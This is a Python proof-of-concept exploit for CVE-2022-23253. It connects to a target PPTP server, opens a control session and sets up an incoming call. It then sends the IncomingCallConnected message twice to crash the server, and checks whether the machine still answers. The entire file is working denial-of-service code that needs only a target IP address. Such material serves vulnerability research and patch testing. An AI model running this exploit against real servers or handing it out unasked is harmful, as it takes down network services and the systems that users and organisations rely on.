import socket import select import secrets import struct import argparse CTL_PORT = 1723 TEST_SERVER = "" # CTL Message Types gStartControlConnectionRequest = 1 gStartControlConnectionReply = 2 gIncomingCallRequest = 9 gIncomingCallReply = 10 gIncomingCallConnected = 11 # Framing Capabillities gAsynchronousFraming = 0x1 gSynchronousFraming = 0x2 # Bearer Capabillities gAnalogAccessSupported = 0x1 gDigitalAccessSupported = 0x2 class CtlClient(): def __init__(self, serverIp, serverPort=CTL_PORT): self.IP = serverIp self.Port = serverPort self.Socket = None self.IsConnected = False def CtlCloseConn(self): self.Socket.close() def CtlSendMsg(self, CtlMessage, multiplier=1): if not self.IsConnected: raise RuntimeError("Attempted to send Ctl data on unconnected client") ctlmsgbuf: bytes = CtlMessage.build() * multiplier self.Socket.send(ctlmsgbuf) def CtlMultiSendMsg(self, CtlMessageArray): if not self.IsConnected: raise RuntimeError("Attempted to send Ctl data on unconnected client") sendBuffer = b"" for CtlMsg in CtlMessageArray: sendBuffer += CtlMsg.build() self.Socket.send(sendBuffer) def CtlRecvMsg(self): chunks = [] ready = select.select([self.Socket], [], [], 1) if ready[0]: chunk = self.Socket.recv(1024) chunks.append(chunk) while(len(chunk) == 1024): chunk = self.Socket.recv(1024) chunks.append(chunk) return b"".join(chunks) def CtlConnect(self, timeout=None): #Connect to the Ctl server self.Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if timeout: self.Socket.settimeout(timeout) self.Socket.connect((self.IP, self.Port)) self.IsConnected = True class ControlMessage(): SIZE = 0xC # 12 byte header def __init__(self, messageType, messageLength, setSize=False, packetBytes=None): if packetBytes: self.MessageLength = 0 self.PptpMessageType = 0 #Magic number self.CtlMagic = 0 self.CtlMessageType = 0 self.Reserved0 = 0 self.SetSize = 0 self.__fromBytes(packetBytes) else: self.MessageLength = messageLength self.PptpMessageType = 0x1 #Magic number self.CtlMagic = 0x1A2B3C4D self.CtlMessageType = messageType self.Reserved0 = 0 self.SetSize = setSize def build(self): buffer = b"" if self.SetSize: # Use the preconfigured set size for this packet self.MessageLength = self.__SIZE buffer += struct.pack(">H", self.MessageLength) buffer += struct.pack(">H", self.PptpMessageType) buffer += struct.pack(">I", self.CtlMagic) buffer += struct.pack(">H", self.CtlMessageType) buffer += struct.pack(">H", self.Reserved0) return buffer def __fromBytes(self, bytebuffer): header = struct.unpack_from(">HHIHH", bytebuffer, 0) self.MessageLength = header[0] self.PptpMessageType = header[1] self.CtlMagic = header[2] self.CtlMessageType = header[3] self.Reserved0 = header[4] class StartControlConnectionRequest(ControlMessage): SIZE = 0x90 def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64): super().__init__(gStartControlConnectionRequest, ControlMessage.SIZE + StartControlConnectionRequest.SIZE) self.protocolVersion = 0x100 self.Reserved1 = 0 self.FramingCapabilities = framing self.BearerCapabilities = bearer self.MaxChannels = maxChannels self.FirmwareRevision = firmwareRevision self.HostName = hostName # 64 byte host name string self.VendorString = vendorString # 64 byte vendor string def build(self): buffer = b"" header = super().build() buffer += struct.pack(">H", self.protocolVersion) buffer += struct.pack(">H", self.Reserved1) buffer += struct.pack(">I", self.FramingCapabilities) buffer += struct.pack(">I", self.BearerCapabilities) buffer += struct.pack(">H", self.MaxChannels) buffer += struct.pack(">H", self.FirmwareRevision) buffer += self.HostName buffer += self.VendorString return header + buffer class StartControlConnectionReply(ControlMessage): SIZE = 0x90 def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64, resultCode=0, errorCode=0, packetBytes=None): super().__init__(gStartControlConnectionReply, ControlMessage.SIZE + StartControlConnectionRequest.SIZE, packetBytes=packetBytes) if packetBytes: self.protocolVersion = 0 self.ResultCode = 0 self.ErrorCode = 0 self.FramingCapabilities = 0 self.BearerCapabilities = 0 self.MaxChannels = 0 self.FirmwareRevision = 0 self.HostName = 0 # 64 byte host name string self.VendorString = 0 # 64 byte vendor string self.__fromBytes(packetBytes) else: self.protocolVersion = 0x100 self.ResultCode = resultCode self.ErrorCode = errorCode self.FramingCapabilities = framing self.BearerCapabilities = bearer self.MaxChannels = maxChannels self.FirmwareRevision = firmwareRevision self.HostName = hostName # 64 byte host name string self.VendorString = vendorString # 64 byte vendor string def build(self): buffer = b"" header = super().build() buffer += struct.pack(">H", self.protocolVersion) buffer += struct.pack(">B", self.ResultCode) buffer += struct.pack(">B", self.ErrorCode) buffer += struct.pack(">I", self.FramingCapabilities) buffer += struct.pack(">I", self.BearerCapabilities) buffer += struct.pack(">H", self.MaxChannels) buffer += struct.pack(">H", self.FirmwareRevision) buffer += self.HostName buffer += self.VendorString return header + buffer def __fromBytes(self, bytebuffer): items = struct.unpack_from(">HBBIIHH", bytebuffer, ControlMessage.SIZE) self.protocolVersion = items[0] self.ResultCode = items[1] self.ErrorCode = items[2] self.FramingCapabilities = items[3] self.BearerCapabilities = items[4] self.MaxChannels = items[5] self.FirmwareRevision = items[6] class IncomingCallRequest(ControlMessage): SIZE = 0xD0 def __init__(self,CallId=1337, CallSerialNumber=1338, CallBearerType=gAnalogAccessSupported, PhysicalChannelId=0, DialedNumberLength=64, DialingNumberLength=64,DialedNumber=64 *b"A", DialingNumber = 64 * b"B", Subaddress= 64 * b"C", packetBytes=None): super().__init__(gIncomingCallRequest, IncomingCallRequest.SIZE + ControlMessage.SIZE, packetBytes=packetBytes) self.CallId = CallId self.CallSerialNumber = CallSerialNumber self.CallBearerType = CallBearerType self.PhysicalChannelId = PhysicalChannelId self.DialedNumberLength = DialedNumberLength self.DialingNumberLength = DialingNumberLength self.DialedNumber = DialedNumber self.DialingNumber = DialingNumber self.Subaddress = Subaddress def build(self): buffer = b"" header = super().build() buffer += struct.pack(">H", self.CallId) buffer += struct.pack(">H", self.CallSerialNumber) buffer += struct.pack(">I", self.CallBearerType) buffer += struct.pack(">I", self.PhysicalChannelId) buffer += struct.pack(">H", self.DialedNumberLength) buffer += struct.pack(">H", self.DialingNumberLength) buffer += self.DialedNumber buffer += self.DialingNumber buffer += self.Subaddress return header + buffer class IncomingCallReply(ControlMessage): SIZE = 0xC def __init__(self,CallId=0x1337, PeersCallId=0x1338, ResultCode=1, ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32, packetBytes=None): super().__init__(gIncomingCallReply, IncomingCallReply.SIZE + ControlMessage.SIZE, packetBytes=packetBytes) if packetBytes: self.CallId = 0 self.PeersCallId = 0 self.ResultCode = 0 self.ErrorCode = 0 self.PacketRecvWindowSize = 0, self.PacketTransitDelay = 0 self.Reserved1 = 0 self.fromBytes(packetBytes) else: self.CallId = CallId self.PeersCallId = PeersCallId self.ResultCode = ResultCode self.ErrorCode = ErrorCode self.PacketRecvWindowSize = PacketRecvWindowSize, self.PacketTransitDelay = PacketTransitDelay self.Reserved1 = 0 def build(self): buffer = b"" header = super().build() buffer += struct.pack(">H", self.CallId) buffer += struct.pack(">H", self.PeersCallId) buffer += struct.pack(">B", self.ResultCode) buffer += struct.pack(">B", self.ErrorCode) buffer += struct.pack(">H", self.PacketRecvWindowSize) buffer += struct.pack(">H", self.PacketTransitDelay) buffer += struct.pack(">H", self.Reserved1) return header + buffer def fromBytes(self, bytebuffer): items = struct.unpack_from(">HHBBHHH", bytebuffer, ControlMessage.SIZE) self.CallId = items[0] self.PeersCallId = items[1] self.ResultCode = items[2] self.ErrorCode = items[3] self.PacketRecvWindowSize = items[4] self.PacketTransitDelay = items[5] self.Reserved1 = items[6] class IncomingCallConnected(ControlMessage): SIZE = 0x10 def __init__(self,PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64, PacketTransmitDelay=0, FramingType = gAsynchronousFraming, packetBytes=None): super().__init__(gIncomingCallConnected, IncomingCallConnected.SIZE + ControlMessage.SIZE, packetBytes=packetBytes) if packetBytes: pass else: self.PeerCallId = PeerCallId self.Reserved1 = 0 self.ConnectSpeed = ConnectSpeed self.PacketRecvWindowSize = PacketRecvWindowsSize self.PacketTransmitDelay = PacketTransmitDelay self.FramingType = FramingType def build(self): buffer = b"" header = super().build() buffer += struct.pack(">H", self.PeerCallId) buffer += struct.pack(">H", self.Reserved1) buffer += struct.pack(">I", self.ConnectSpeed) buffer += struct.pack(">H", self.PacketRecvWindowSize) buffer += struct.pack(">H", self.PacketTransmitDelay) buffer += struct.pack(">I", self.FramingType) return header + buffer def startControlSession(): pocClient = CtlClient(TEST_SERVER) initializeCtlConnection = StartControlConnectionRequest() pocClient.CtlConnect() pocClient.CtlSendMsg(initializeCtlConnection) StartControlReply_raw = pocClient.CtlRecvMsg() initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw) if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1: raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....") return pocClient def poke_server(): try: print("[+] Pokeing the target....") poke_client = CtlClient(TEST_SERVER) poke_client.CtlConnect(timeout=1) print("[-] Its alive!?") except Exception as e: print("[+] Yep, its dead") def trigger_cve_2022_23253(): print("[+] Starting PPTP control connection") pocClient = startControlSession() newCallId = secrets.randbelow(0x10000) newCallSerial = secrets.randbelow(0x10000) newIncomingCall = IncomingCallRequest(CallId=newCallId,CallSerialNumber=newCallSerial) #Requests Causing Issues print("[+] Creating new incoming call") pocClient.CtlSendMsg(newIncomingCall) ICReply_raw = pocClient.CtlRecvMsg() newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw) print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId)) if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0: raise ValueError("[:(] PoC failed unexpecadle due to server side error... ") newIncomingCallConnected = IncomingCallConnected(newIncomingCallReply.CallId, 64, newIncomingCallReply.PacketRecvWindowSize, newIncomingCallReply.PacketTransitDelay) print("[+] Triggering Bug!") pocClient.CtlSendMsg(newIncomingCallConnected) pocClient.CtlSendMsg(newIncomingCallConnected) print("[+] Machine should be dead now, lets check!") poke_server() def main(): global TEST_SERVER global CTL_PORT parser = argparse.ArgumentParser(description="PoC for CVE-2022-23253!") parser.add_argument('--ip', type=str,required=True,dest="ip_address",help="IP address of the target server") parser.add_argument('--port', type=int, default=CTL_PORT,dest="ctl_port", help="Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT)) args = parser.parse_args() TEST_SERVER = args.ip_address CTL_PORT = args.ctl_port continue_to_trigger = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ") if continue_to_trigger.lower() == "y": print("[+] Triggering Bug!") trigger_cve_2022_23253() else: print("[+] GoodBye!") if __name__ == '__main__': main()